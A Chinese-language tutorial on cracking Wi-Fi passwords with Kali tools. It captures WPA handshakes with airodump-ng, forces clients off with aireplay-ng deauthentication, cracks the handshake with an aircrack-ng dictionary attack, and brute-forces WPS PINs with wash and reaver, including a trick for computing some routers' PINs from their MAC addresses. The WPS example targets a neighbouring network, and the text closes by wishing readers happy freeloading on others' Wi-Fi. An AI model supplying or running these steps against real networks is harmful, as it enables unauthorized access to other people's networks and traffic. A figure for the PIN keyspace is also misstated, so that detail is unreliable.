作者:黑色天使
工具:
1:筆記本
2:USB無線網(wǎng)卡(必備)
3:kali系統(tǒng)
4:靠譜字典
第一種方法:
暴力破解法
何為暴力破解呢,其實(shí)就是一個一個密碼試,直到正確的密碼為止。
現(xiàn)在的wifi一般加密都是:
1、不啟用安全????2、WEP????
3、WPA/WPA2-PSK(預(yù)共享密鑰)????
4、WPA/WPA2 802.1X (radius認(rèn)證)
進(jìn)入正題:
第一步:
進(jìn)入kali啟動終端輸入如下:
root@kali:~# airmon-ng
看看網(wǎng)卡信息
第二步:
輸入:
airmon-ng start wlan0
監(jiān)聽窗口
第三步:
輸入:
airodump-ng mon0
掃描wifi信號
這里我用自己家wifi做實(shí)驗(yàn)
第四步:
這是我家wifi:
上圖可以看出
BSSID是00:0F:32:A0:99:DC? ???信道(CH)是:1
輸入:
airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one
解釋:CH表示信道,信道是多少就填多少,freedom是一會抓握手包的文件名字,他會自動生成一個freedom.cap的文件,這個名字隨便你們填什么
00:0F:32:A0:99:DC??64:5A:04:BB:54:57? ?-4? ? 0e- 0e? ???0? ?? ?400
00:0F:32:A0:99:DC 這個是路由器的mac
64:5A:04:BB:54:57 這個是客戶端的mac
第五步:
重新開一個客戶端輸入命令:
aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one
掉線了,當(dāng)我們重新連接抓到握手包
第六步:
破解握手包:
命令如下:
aircrack-ng -w mi freedom-*.cap
解釋:mi字典名字? ?? ?freedom-*.cap
abc123abc這個就是我的wifi密碼
破解完成,成功與否靠強(qiáng)大的字典和運(yùn)氣了,希望各位親們蹭網(wǎng)愉快!!!
第二種:通過pin碼破解
這個方法很簡單:
第一步:Wash 掃描開啟WPS的網(wǎng)絡(luò)。
wash -i mon1 –C
小編的周圍沒有開啟wps功能我wifi,就會出現(xiàn)上圖那樣,這樣咋辦呢
不要急,因?yàn)橛行╇[藏了起來,我們直接霸王硬上弓
用前面那個掃wifi的命令:
airodump-ng mon0
看見小編圈起來的mac沒有,選擇一個PWR的值的絕對值小于70的wifi破解
第二步:
我在這選擇的是名字為:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E??-45? ?? ???2? ?? ???0? ? 0? ?6??54e. WPA2 CCMP? ?PSK??FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 這個mac根據(jù)路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
如圖上表示可以破解,開啟了wps功能
出現(xiàn)上圖這樣,就表示不能破解換其他wifi破解吧孩子
這樣就表示破解出來了
小知識:
如果密碼被改了你知道他wifi的pin碼就用如下命令:reaver-i mon0 -b MAC -p PIN
pin碼有8位:所以就是10的8次方,要窮舉1000000000次
這樣pin也是有限制的,比如要被pin出的路由器必須得開啟wps功能;貌似現(xiàn)在很多都是防pin路由器或300秒pin限制的。
有些路由pin碼可以通過計(jì)算得到:騰達(dá)和磊科的產(chǎn)品如果路由MAC地址是以“C83A35”或“00B00C”打頭那么可以直接計(jì)算出PIN值。
比如這個:bssid :Tenda_579A18? ? mac :C8:3A:35:57:9A:18??通過計(jì)算器將mac后6位換算成10進(jìn)制數(shù),得到5741080(pin碼的前7位),最多試10次或通過軟件得到該路由pin碼!
破解時推薦這個命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因?yàn)楱Cd9 –t9參數(shù)可以防止pin死路由器。
全文到此結(jié)束